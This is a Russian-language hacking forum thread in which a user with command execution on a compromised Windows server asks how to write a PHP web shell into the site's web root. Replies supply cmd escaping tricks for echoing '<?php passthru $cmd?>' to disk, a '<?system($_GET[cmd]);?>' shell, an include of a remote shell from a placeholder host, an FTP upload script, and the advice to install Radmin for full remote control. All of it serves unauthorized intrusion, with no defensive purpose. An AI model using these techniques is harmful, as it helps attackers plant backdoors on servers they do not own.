![]() |
cmd????
Вопрос такой!
Есть доступ к командной строке на win сервере , через cmd могу выполнять команды , хотел создать файл Php и впихнуть , синтаксис такой так создается echo test > "D:\Website\WWW\1.php" если так вообще ничего не создается echo <?php passthru $cmd?> > "D:\Website\WWW\1.php" если так ,создается, но с кавычками echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php" т.е. на выходе получаю "<?php passthru $cmd?>" Php на серваке есть! Как добавить Php код , чтобы он выполнялся!?Желательно <?@include('http://hack/shell.txt');?> p.s. ftp не предлагать , tftp тоже, не прокатит,Фаер фильтрут выход.!!! |
как выйти именно из этой ситуации я хз..
Попробуй поднять фтп и передать шел =) |
gold-goblin
Да не да типичная ситуация, попробуй на своем компе локально создать файл и передать ему php код. Я просто не знаю точного синтаксиса на win |
нах тебе php-шелл, если у тебя уже cmd-шелл?
|
Цитата:
|
а чем кавычки мешают ? он и с ними будет нормально интерпретироваться.
|
to geezer.code
нет белый фон "" а в исходники страницы "<?phpinfo();?>" вообще не в тему Pashkela |
Цитата:
сначала залил, точно как ты, а потом edit и убираешь кавычки |
)))это локально)) , а у меня через сплоит перловый!
|
а ты сделай "<?php phpinfo();?>" обязательно - php
проверил локально, работает. "<?phpinfo();?>" тоже выводит "" :) |
Тогда так:
echo ^<?php passthru $cmd?^> > "D:\Website\WWW\1.php" |
Создай сначала сам файл: echo > 1.php
Затем отредакти его: edit > 1.php и впиши свой код, затем сохрани и все) |
просто сервак глюченый , ничего не получилось)!
|
смотри за пробелами!!!
<? phpinfo(); ?> попробуй так еще: эхом создаешь файл с кавычками, через more - попробуй их убрать потом. ну а если сделаешь вместо кавычек табуляцию, то потом: more /T1 file.php |
что там с правами
ибо в той дире де бажный скрипт работает php В чем может быть дело еще? |
У меня была подобная ситуация. У меня был шел вида <?php system(cmd) ?>. Вся проблема состоит в том, что тебе дает выполнять только одну команду. И команда edit ничего не даст. Решение было такое - так как "сервак" виндовый - можно залить Radmin и уже спомощью него можно делать что угодно.
Залить лучше всего через ФТП. команды такие Код:
echo open ТВОЙ_FTP>go |
fly, я не понимаю в чём там проблема. ДОлжно всё работать. Объясни подробнее что не получаеся.
Может просто регистрГолобалз ОФФ? ТОгда нужно шелл такой создавать: <?system($_GET[cmd]);?> |
| Время: 00:19 |